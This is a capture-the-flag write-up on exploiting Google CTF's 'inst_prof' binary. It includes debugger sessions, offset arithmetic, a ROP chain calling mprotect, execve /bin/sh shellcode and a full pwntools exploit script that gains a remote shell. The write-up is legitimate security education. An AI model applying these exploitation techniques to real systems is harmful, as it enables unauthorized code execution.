The first plan I pitched was that of performing a ret2libc -type exploit where we simply called libc's system function with /bin/bash as the target. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system , and making a small ROP chain to jump to this function.

When we started down this road, it became apparent that there were some formidible obstacles in our way. Mainly the PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect was being called set in. And so Plan B took form.

Plan B

Once we realized that mprotect was called by the make_page_executable function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.

In theory.

We ruled out the page allocated by alloc_page since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable, however we were unsuccessful (attributing the lack of success to some "unknown" feature of NX , whereas I'd learn later that we were specifying an unaligned address to mprotect ) It was at this point that we called it a night and I went to bed dreaming of armored assembly .

The Next Day

After sleeping on it, I solidified the plan as follows:

1) Find writable region of memory a) Region must be a constant offset to some known, reference-able address 2) Write shellcode to that region of memory 3) Set up call to `mprotect` through the `make_page_executable` call a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi` 4) Get `rip` to the shellcode

Reflecting upon the previous days' work, I realized that I needed region of memory that was always writable, and which would always be at a constant offset within the .text section.

I originally performed all of the following work on a writable section located just above (visually; lower memory address) the page allocated by alloc_page and got it working reliably on my local machine. However after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, however I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but substituting the GOT section as my target rather than the failed one.

The Global Offset Table remained writable (due to only parital RELRO ) and was part of the contiguous section of memory mapped with the .text section. And fortunately there was a reference to the .text section located at the top of the stack each time we entered the loop-executable section:

[ 0x562e80db3b16 ] > pd 2 ;-- rip: 0x562e80db3b16 b ffd3 call rbx 0x562e80db3b18 0f31 rdtsc [ 0x562e80db3b16 ] > ds ; pd 8 ;-- map.unk2._rw_: ;-- rbx: ;-- rdi: 0x7fa9a763e000 b900100000 mov ecx , 0x1000 ; rsi .-> 0x7fa9a763e005 90 nop | 0x7fa9a763e006 90 nop | 0x7fa9a763e007 90 nop | 0x7fa9a763e008 90 nop | 0x7fa9a763e009 83e901 sub ecx , 1 `=< 0x7fa9a763e00c 75f7 jne 0x7fa9a763e005 0x7fa9a763e00e c3 ret [ 0x7fa9a763e000 ] > pxq 8 @ rsp 0x7ffd632550d8 0x0000562e80db3b18 .;...V..

Notice in the highlighted lines that the instruction address after call rbx is at the top of the stack in our loop executable section

This is in fact the return address within do_test pushed by the call rbx instruction. To check that this return address was a constant offset from the Global Offset Table, I simply subtracted the return addresss from the GOT address, and re-ran the executable:

[ 0x7fa9a763e000 ] > iS ~got idx = 22 vaddr = 0x562e80fb4fd8 paddr = 0x00001fd8 sz = 40 vsz = 40 perm =-- rw - name =. got idx = 23 vaddr = 0x562e80fb5000 paddr = 0x00002000 sz = 112 vsz = 112 perm =-- rw - name =. got . plt [ 0x7fa9a763e000 ] > pxq 8 @ rsp 0x7ffd632550d8 0x0000562e80db3b18 .;...V.. [ 0x7fa9a763e000 ] > ? section..got.plt - [rsp] 2102504 0x2014e8 010012350 2M 20000 : 04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504 . 0 2102504 . 000000f 2102504 . 000000

The iS command is the i nformation on S ections command, which displays addresses of the different sections mapped by the process. The ? command is used to perform math operations and returns the answer in a wide variety of formats. The ~ character appended to any command will filter the output much like grep does.

I saw that the GOT address was exactly 0x2014e8 past the return address. Closing and re-opening the program did not change this; however PIE did ensure that the text section's base address was randomized on each execution (save for the last 12 bits). As long as I only used offsets relative to the text section address (provided as a return address from our looped section) then PIE (and ASLR) wouldn't do much to mitigate my efforts.

Seeing from our earlier dm output above of the memory map that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.

And So ROP Begins...

The next challenge was how I'd get the address into the r15 register. I knew I could simply load the address from rsp using mov r15, [rsp] , which was a 4 byte instruction. But then I'd need to add to it the offset 0x2014e8 to get our GOT address.

My first thought was to simply use the inc r15 command several (hundred) times, but even utilizing the 0x1000 loops, it would take 0x2014e8 / 0x1000 == 513 calls to the loop to increment it enough times. Instead, I used the loop counter itself ( rsi == 0x1000 ) as a starting value and doubled it 9 times to get the value into another placeholder register. This is where the exploit script started to take form, and here were the first few lines:

#!/usr/bin/env python2 from pwn import * #open the process p = process ( "./inst_prof" ) #print program prompt print ( p . readline ()) #now we get the return address (text section reference) into r13: p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] #now we need the 0x1000 value into r14: p . send ( " \x49\x01\xf6\xc3 " ) #add r14, rsi #and double it 9 times: for x in range ( 9 ): p . send ( " \x4d\x01\xf6\xc3 " ) #add r14, r14

Note that for both the add instrucions that the last byte is 0xc3 , which is the ret instruction; this shortcuts the loop letting the addition take place exactly 1 time. To generate the assembled bytes for these instructions I used the rasm2 binary (which comes with radare2) with the keystone assembler: rasm2 -ax86.ks -b64 "add r14, r14" . To install keystone assembler, use r2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone from a terminal prompt.

It was here I decided to test the script. To do so I added the import from IPython import embed , and added embed() to the script. This allowed me to pause execution (at any place within the script) and attach the r2 debugger to the running process to inspect its state. I simply ran the script with ./solver.py , and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2 :

-> % r2 -d 14198 [ 0x7f30b1ae4360 ] > dr r13; dr r14; dr r15 0x55ec37271b18 0x00200000 0x00000000

And lo and behold, I had my text section reference as well as the start of my offset calculation in r13 and r14 respectively.

To get the rest of the offset into the r14 register, I added a few more lines to the script to add 0x1000 , 0x246 * 2, and finally inc rement 0x5c more times to get the desired value:

#add another 0x1000 to r14: p . send ( " \x49\x01\xf6\xc3 " ) #add r14, rsi #0x246 + 0x246 = 0x48c for x in range ( 2 ): p . send ( " \x4d\x01\xde\xc3 " ) #add r14, r11 #0x201000 + 0x48c = 0x20148c #0x2014e8 - 0x20148c = 0x5c for x in range ( 0x5c ): p . send ( " \x49\xff\xc6\xc3 " ) #inc r14

I'd noticed every time entering the loop section that the r11 register was set to 0x246 , which I added to the offset in the highlighted line above

At this point I should have both the text section address in r13 , as well as the offset needed to reference the GOT in r14 . To test, I added the following line to my script to add r14 to r13 :

p . send ( " \x4d\x01\xf5\xc3 " ) #add r13, r14

Then ran ./solver.py and attached with r2:

[ 0x7fb876853360 ] > dr r13; dr r14; dr r15 0x558b57e11000 0x002014e8 0x00000000 [ 0x7fb876853360 ] > ? section..got.plt 94056963182592 0x558b57e11000 02530552770210000 87597 . 4G b57e1000 : 0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592 . 0 94056965210112 . 000000f 94056963182592 . 000000

Success! I had successfully calculated the offset from the loop section 's return address to the start of the GOT, and loaded it into one of our scratch registers.

Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:

[ 0x7fb876853360 ] > pxq @ section..got.plt 0x558b57e11000 0x0000000000201e08 0x00007fb876d3d0f0 .. ........v.... 0x558b57e11010 0x00007fb876b2e5f0 0x00007fb8768533b0 ...v.....3.v.... 0x558b57e11020 0x00007fb87685ca50 0x0000558b57c0f7d6 P..v.......W.U.. 0x558b57e11030 0x00007fb876853350 0x00007fb876795420 P3.v.... Tyv.... 0x558b57e11040 0x0000558b57c0f806 0x00007fb87685cb20 ...W.U.. ..v.... 0x558b57e11050 0x00007fb87685cb50 0x0000558b57c0f836 P..v....6..W.U.. 0x558b57e11060 0x0000558b57c0f846 0x0000558b57c0f856 F..W.U..V..W.U.. 0x558b57e11070 0x0000000000000000 0x0000558b57e11078 ........x..W.U.. 0x558b57e11080 0x0000000000000000 0x0000000000000000 ................ 0x558b57e11090 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110a0 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110b0 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110c0 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110d0 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110e0 0x0000000000000000 0x0000000000000000 ................ 0x558b57e110f0 0x0000000000000000 0x0000000000000000 ................

I selected the address on the highlighted line, which was 0xa0 past the GOT start. Since I'd learned that mprotect would only work on addresses that were multiples of 0x1000 , I kept the GOT address in r13 for use in the ROP chain that I was planning to construct.

Second Stack

Now that I had reference to a writable region of memory, I set r15 to point 0xa0 pass the GOT where I'd place all my data for the exploit, including the shellcode and the ROP chain.

First I set r14 to 0xa0:

p . send ( " \x4d\x31\xf6 " + ret ) #xor r14, r14 for x in range ( 0xa0 ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14

It was here that I'd decided that I'd want a way to distinguish easily the 3 and 4 byte instructions, so I refactored all the instructions with ret bytes to instead append a ret variable where ret == '0xc3'

Then set r15 to r13 + r14 :

#now copy to r15: p . send ( " \x4d\x89\xef " + ret ) #mov r15, r13 #now add r15, r14: p . send ( " \x4d\x01\xf7 " + ret ) #add r15, r14

Since my plan was to use r15 as the cursor into the second stack, I set r14 to this address:

p . send ( " \x4d\x89\xfe " + ret ) #mov r14, r15

I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr() function and directive to my solver script. This is what it looked like at that point:

#!/usr/bin/env python2 from pwn import * ret = " \xc3 " def writeByteStr ( byteString ): writeCmd = ' \x41\xc6\x07 ' #mov byte [r15], {} incCmd = ' \x49\xff\xc7 ' #inc r15 for b in byteString : p . send ( writeCmd + b ) p . send ( incCmd + ret ) #open the process p = process ( "./inst_prof" ) #print program prompt print ( p . readline ()) #now we get the return address (text section reference) into r13: p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] #now we need the 0x1000 value into r14: p . send ( " \x49\x01\xf6 " + ret ) #add r14, rsi #and double it 9 times: for x in range ( 9 ): p . send ( " \x4d\x01\xf6 " + ret ) #add r14, r14 #add another 0x1000 to r14: p . send ( " \x49\x01\xf6 " + ret ) #add r14, rsi #0x246 + 0x246 = 0x48c for x in range ( 2 ): p . send ( " \x4d\x01\xde " + ret ) #add r14, r11 #0x201000 + 0x48c = 0x20148c #0x2014e8 - 0x20148c = 0x5c for x in range ( 0x5c ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 p . send ( " \x4d\x01\xf5 " + ret ) #add r13, r14 p . send ( " \x4d\x31\xf6 " + ret ) #xor r14, r14 for x in range ( 0xa0 ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 #now copy to r15: p . send ( " \x4d\x89\xef " + ret ) #mov r15, r13 #now add r15, r14: p . send ( " \x4d\x01\xf7 " + ret ) #add r15, r14 #save second stack pointer p . send ( " \x4d\x89\xfe " + ret ) #mov r14, r15 #write shellcode to second stack writeByteStr ( ' \x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68 ' + \ ' \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 ' )

And I launched it so I could inspect with r2 to see if everything was in working order:

-> % r2 -d 5703 [ 0x7f5463e3c360 ] > dr r13; dr r14; dr r15 0x558ef8c55000 0x558ef8c550a0 0x558ef8c550ca [ 0x7f5463e3c360 ] > pxq 0x30 @ r14 0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi 0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH. 0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........

Excellent. We can see that r13 holds our GOT reference, while r14 points to the top of our second stack, and r15 points just past the last byte written ( 05 from my shellcode).

By this point I'd solved problems 1 and 2:

1) Find writable region of memory a) Region must be a constant offset to some known, reference-able address 2) Write shellcode to that region of memory

And now had steps 3 and 4 left:

3) Set up call to `mprotect` through the `make_page_executable` call a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi` 4) Get `rip` to the shellcode

To Call or Not to Call

Having looked at the call to make_page_executable from before, we saw that the first argument to mprotect is passed as an argument to make_page_executable in the rdi register. Therefore I needed to find a pop rdi gadget that I'd call prior to calling make_page_executable in the ROP chain.

Fortunately, r2 has a handy ROP search tool:

[ 0x7f5464323000 ] > s main [ 0x558ef8a53860 ] > dr r13; dr r14; dr r15 0x558ef8c55000 0x558ef8c550a0 0x558ef8c550ca [ 0x558ef8a53860 ] > /R/ pop rdi 0x558ef8a53bc3 5f pop rdi 0x558ef8a53bc4 c3 ret [ 0x558ef8a53860 ] > pxq 8 @ rsp 0x7ffcaacd0eb8 0x0000558ef8a53b18 .;...U.. [ 0x558ef8a53860 ] > ? 0x558ef8a53bc3 - [rsp] 171 0xab 0253 171 0000 : 00ab 171 "\xab" 10101011 171 . 0 171 . 000000f 171 . 000000

/R/ allows searching for ROP gadgets using a regular expression

In the first highlighted line above, I use the gadget search tool to find a pop rdi gadget, and then calculate it's offset from the return address in [rsp] , showing that the gadget is 0xab past the return address.

At this point I needed an additional qword of scratch space to work with, so I incremented my shellcode address by +8, leaving r14 pointing to a spare word on my second stack, to which I wrote the GOT address to. With this code change my current state of registers + seconds stack went from :

r13 == GOT address r14 == 2nd stack base r15 == 2nd stack cursor [rsp] == text section reference [r14] == shellcode

To:

r13 == scratch r14 == 2nd stack base r15 == 2nd stack cursor [rsp] == text section reference [r14] == GOT address [r14+8] == shellcode

Or to illustrate with radare, it went from:

[ 0x558ef8a53860 ] > dr r13; dr r14; dr r15 0x558ef8c55000 0x558ef8c550a0 0x558ef8c550ca [ 0x558ef8a53860 ] > pxq 0x40 @ r14 0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi 0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH. 0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........ 0x558ef8c550d0 0x0000000000000000 0x0000000000000000 ................

To:

[ 0x55eefe549b16 ] > dr r13; dr r14; dr r15 0x55eefe74b000 0x55eefe74b0a0 0x55eefe74b0d2 [ 0x55eefe549b16 ] > pxq 0x40 @ r14 0x55eefe74b0a0 0x000055eefe74b000 0x4850ec8948c03148 ..t..U..H1.H..PH 0x55eefe74b0b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH... 0x55eefe74b0c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...; 0x55eefe74b0d0 0x000000000000050f 0x0000000000000000 ................

Now that the GOT address was saved at [r14] , this freed up r13 to do some more offset calculation needed for the pop rdi gadget I found.

I simply needed [rsp] + 0xab to start my rop chain, which I accomplished via:

p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] for x in range ( 0xab ): p . send ( " \x49\xff\xc5 " + ret ) #inc r13 #save pop addr on rop stack: p . send ( " \x4d\x89\x2f " + ret ) #mov [r15], r13

r15 now holds the start of our rop chain, which is the pop rdi gadget's address. Since ROP depends fully on the state of the rsp register (and the memory region it points to), we have to make sure that the pop rdi gadget will pop the correct value into rdi , which needs to be the argument we want to supply to make_page_executable , namely the page-aligned address of the GOT we want to mark as executable.

So I load this from our previously saved location at r14 into r13 , and write that to our second stack plus 8:

p . send ( " \x4d\x8b\x2e " + ret ) #mov r13, [r14] p . send ( " \x4d\x89\x6f\x08 " ) #mov [r15+8], r13

At this point, our second stack looks like this (logically):

+------------------------+ ;r14 | GOT address | +------------------------+ | | | Shellcode | | | +------------------------+ ;r15 | pop rdi gadget | +------------------------+ | GOT address | +------------------------+

And with radare2 :

[ 0x55ba1eb91b16 ] > dr r13; dr r14; dr r15 0x55ba1ed93000 0x55ba1ed930a0 0x55ba1ed930d2 [ 0x55ba1eb91b16 ] > pxq 0x40 @ r14 0x55ba1ed930a0 0x000055ba1ed93000 0x4850ec8948c03148 .0...U..H1.H..PH 0x55ba1ed930b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH... 0x55ba1ed930c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...; 0x55ba1ed930d0 0x55ba1eb91bc3050f 0x55ba1ed930000000 .......U...0...U [ 0x55ba1eb91b16 ] > pxq 0x20 @ r15 0x55ba1ed930d2 0x000055ba1eb91bc3 0x000055ba1ed93000 .....U...0...U.. 0x55ba1ed930e2 0x0000000000000000 0x0000000000000000 ................ [ 0x55ba1eb91b16 ] > pd 2 @ [r15] 0x55ba1eb91bc3 5f pop rdi 0x55ba1eb91bc4 c3 ret

note that the value in r15 is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the first pxq output at r14 , which is why I repeat the pxq at the r15 register, where the pop rdi gadget and GOT address are more easily seen and recognized.

All that's left is to add the mprotect call and our shellcode address to the ROP chain.

To do that, we have to calculate the offset from [rsp] to make_page_executable :

[ 0x7f88cc42b000 ] > ? sym.make_page_executable - [rsp] -248 0xffffffffffffff08 01777777777777777777410 17179869184 . 0G fffff000 : 0f08 - 248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 - 248 . 0 - 248 . 000000f - 248 . 000000 [ 0x7f88cc42b000 ] > ? [rsp] - sym.make_page_executable 248 0xf8 0370 248 0000 : 00f8 248 "\xf8" 11111000 248 . 0 248 . 000000f 248 . 000000

Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8 to get the call to make_page_executable :

p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] for x in range ( 0xf8 ): p . send ( " \x49\xff\xcd " + ret ) #dec r13

And then add this to our ROP chain:

p . send ( " \x4d\x89\x6f\x10 " ) #mov [r15+0x10], r13

Now the second stack + rop chain looks like this:

+--------------------------------+ ;r14 | GOT address | +--------------------------------+ | | | Shellcode | | | +--------------------------------+ ;r15 | pop rdi gadget | +--------------------------------+ | GOT address | +--------------------------------+ | make_page_executable gadget | +--------------------------------+

We simply need to get our shellcode address at the end of this rop chain, and then set rsp to the start of our rop chain.

#save current second stack pointer into r13: p . send ( " \x4d\x89\xfd " + ret ) #mov r13, r15 #advance pointer 3 qwords for x in range ( 0x18 ): p . send ( " \x49\xff\xc5 " + ret ) #inc r13 #point r14 to our shellcode for x in range ( 0x8 ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 #and write shellcode address here: p . send ( " \x4d\x89\x75\x00 " ) #mov [r13], r14

I had originally tried mov [r15+0x18], [r14+0x8] , however it turns out you can't do two dereferences in a single mov instruction, so I ended up removing (unnecessarily) both dereferences by splitting the instruction into two explicit mov s. I could have avoided working with the second stack pointer (through r13 ) and simply mov [r15+0x18], r14 , however at the time I didn't notice this.

Now the second stack should be set up like so:

+--------------------------------+ | GOT address | +--------------------------------+ ;r14 | | | Shellcode | | | +--------------------------------+ ;r15 | pop rdi gadget | +--------------------------------+ | GOT address | +--------------------------------+ | make_page_executable gadget | +--------------------------------+ ;r13 | <shellcode address> | +--------------------------------+

And we verify:

[ 0x7f0e471a5000 ] > dr r13; dr r14; dr r15 0x56103a1800ea 0x56103a1800a8 0x56103a1800d2 [ 0x7f0e471a5000 ] > pxq 0x60 @ r14 - 0x8 0x56103a1800a0 0x000056103a180000 0x4850ec8948c03148 ...:.V..H1.H..PH 0x56103a1800b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH... 0x56103a1800c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...; 0x56103a1800d0 0x561039f7ebc3050f 0x56103a1800000000 .....9.V.....:.V 0x56103a1800e0 0x561039f7ea200000 0x56103a1800a80000 .. ..9.V.....:.V 0x56103a1800f0 0x0000000000000000 0x0000000000000000 ................ [ 0x7f0e471a5000 ] > pxq 0x30 @ r15 0x56103a1800d2 0x0000561039f7ebc3 0x000056103a180000 ...9.V.....:.V.. 0x56103a1800e2 0x0000561039f7ea20 0x000056103a1800a8 ..9.V.....:.V.. 0x56103a1800f2 0x0000000000000000 0x0000000000000000 ................ [ 0x7f0e471a5000 ] > pd 2 @ [r15] 0x561039f7ebc3 5f pop rdi 0x561039f7ebc4 c3 ret [ 0x7f0e471a5000 ] > pd 6 @ [r15 + 0x10] | ;-- make_page_executable: | 0x561039f7ea20 55 push rbp | 0x561039f7ea21 ba05000000 mov edx , 5 | 0x561039f7ea26 be00100000 mov esi , 0x1000 ; rsi | 0x561039f7ea2b 4889e5 mov rbp , rsp | 0x561039f7ea2e 5d pop rbp `=< 0x561039f7ea2f e9ecfdffff jmp sym . imp . mprotect [ 0x7f0e471a5000 ] > pd 16 @ [r15 + 0x18] ;-- r14: 0x56103a1800a8 4831c0 xor rax , rax 0x56103a1800ab 4889ec mov rsp , rbp 0x56103a1800ae 50 push rax 0x56103a1800af 4889e2 mov rdx , rsp 0x56103a1800b2 48bbff2f6269. movabs rbx , 0x68732f6e69622fff 0x56103a1800bc 48c1eb08 shr rbx , 8 0x56103a1800c0 53 push rbx 0x56103a1800c1 4889e7 mov rdi , rsp 0x56103a1800c4 50 push rax 0x56103a1800c5 52 push rdx 0x56103a1800c6 4889e2 mov rdx , rsp 0x56103a1800c9 50 push rax 0x56103a1800ca 57 push rdi 0x56103a1800cb 4889e6 mov rsi , rsp 0x56103a1800ce b03b mov al , 0x3b ; ';' ; 59 0x56103a1800d0 0f05 syscall

I use the pd commands above to illustrate that each address (save for the GOT address) at r15 points to the appropriate address in the executable for our ROP chain The last pd at [r15 + 0x18] shows my disassembled shellcode. I had to update my shellcode for this challenge to set rsp to point back at the original stack space stored in rbp (highlighted above) because the GOT was no longer marked as writable (which the stack needs to be, since I used push instructions in my shellcode).

All that's left is to load our rop chain address in r15 into rsp , and watch it rain shell:

p . send ( " \x4c\x89\xfc\xc3 " ) #mov rsp, r15; ret

At this point I tested locally, getting a shell locally, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.

The Sweet, Sweet Solution

I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.

Something I found interesting about the solution for this challenge is that unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the r12 register to leak data (albeit in a slightly obfuscated manner) with the subsequent call to write() that the program made. Also, I now know that pwntools has an asm() function that will simplify my life in the future ;)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 #!/usr/bin/env python2 from pwn import * from time import sleep from IPython import embed ret = " \xc3 " testing = True if testing : p = process ( "./inst_prof" ) #p = remote("127.0.0.1", 9090) else : p = remote ( "inst-prof.ctfcompetition.com" , 1337 ) #context.timeout = 0.2 sleep ( 5.5 ) def writeByteStr ( byteString ): writeCmd = ' \x41\xc6\x07 ' #mov byte [r15], {} incCmd = ' \x49\xff\xc7 ' #inc r15 for b in byteString : p . send ( writeCmd + b ) p . send ( incCmd + ret ) def shiftR15Qword (): for x in range ( 8 ): p . send ( " \x49\xff\xc7\xc3 " ) #inc r15 def main (): #read inital output: print ( p . readline ()) #now program is waiting for our 4 bytes #first we create our "2nd stack" where we'll store our ROP #chain: #get text section reference: p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] #constant offset from text.seg.ref to GOT: #[rsp] + 0x2014e8 == GOT #go 0xa0 further than that to get to blank section #total == [rsp] + 0x2014e8 + 0xa0 == 0x201588 #get offset into r14 (r14 is 0 right now): p . send ( " \x49\x01\xf6 " + ret ) #add r14, rsi #rsi == 0x1000 #now double r14 9 times: for x in range ( 0x9 ): p . send ( " \x4d\x01\xf6 " + ret ) #add r14, r14 #now r14 is 0x200000, add another 0x1000: p . send ( " \x49\x01\xf6 " + ret ) #add r14, rsi #0x588 left #r11 seems to be 0x246 all the time.... for x in range ( 2 ): p . send ( " \x4d\x01\xde " + ret ) #add r14, r11 #0x5c + 0xa0 left: for x in range ( 0x5c ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 #now we have GOT Address, save it: p . send ( " \x4d\x01\xf5 " + ret ) #add r13, r14 #clear r14: p . send ( " \x4d\x31\xf6 " + ret ) #xor r14, r14 for x in range ( 0xa0 ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 #now copy to r15: p . send ( " \x4d\x89\xef " + ret ) #mov r15, r13 #now add r15, r14: p . send ( " \x4d\x01\xf7 " + ret ) #add r15, r14 #save second stack pointer p . send ( " \x4d\x89\xfe " + ret ) #mov r14, r15 #get r15 past our saved text section ref shiftR15Qword () #now lets write our shellcode: writeByteStr ( ' \x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f ' + \ ' \x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52 ' + \ ' \x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 ' ) #save GOT address at [r14]: p . send ( " \x4d\x89\x2e " + ret ) #mov [r14], r13 #now we need pop rdi gadget #pop rdi == [rsp] + 0xab p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] for x in range ( 0xab ): p . send ( " \x49\xff\xc5 " + ret ) #inc r13 #save pop addr on rop stack: p . send ( " \x4d\x89\x2f " + ret ) #mov [r15], r13 #save addr of region to be mprotected as 1st rop gadget arg: p . send ( " \x4d\x8b\x2e " + ret ) #mov r13, [r14] p . send ( " \x4d\x89\x6f\x08 " ) #mov [r15+8], r13 #now we need to call mprotect and jump to shellcode: #mprotect is [rsp] - 0xf8 p . send ( " \x4c\x8b\x2c\x24 " ) #mov r13, [rsp] for x in range ( 0xf8 ): p . send ( " \x49\xff\xcd " + ret ) #dec r13 #push mprotect gadget: p . send ( " \x4d\x89\x6f\x10 " ) #mov [r15+0x10], r13 #save current second stack pointer into r13: p . send ( " \x4d\x89\xfd " + ret ) #mov r13, r15 #advance pointer 3 words for x in range ( 0x18 ): p . send ( " \x49\xff\xc5 " + ret ) #inc r13 #point r14 to our shellcode for x in range ( 0x8 ): p . send ( " \x49\xff\xc6 " + ret ) #inc r14 #and write shellcode address here: p . send ( " \x4d\x89\x75\x00 " ) #mov [r13], r14 #embed() #now we set rsp == r15 and let it "rip"..heh p . send ( " \x4c\x89\xfc\xc3 " ) #mov rsp, r15; ret p . interactive () if __name__ == "__main__" : main ()

And here is what it looked like running it:

-> % ./solver.py [ + ] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done initializing prof...ready [ * ] Switching to interactive mode b \x 10 \x 00 \x 00 \x 00 \x 00 \x 00 \x 00Y \x 00 \x 00... ...<redacted lots of bytes>... ... \x 00 \x 00 \x 00 \x 00 \x 00� \x 00 \x 00 \x 00 \x 00 \x 00 \x 00 \x 11 \x ls $ ls flag.txt inst_prof $ cat flag.txt CTF { 0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r } $ exit [ * ] Got EOF while reading in interactive

Post-Exploitation

Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.

Of course I wouldn't be able to do this with out the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.

Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.

Until next time!

-Chris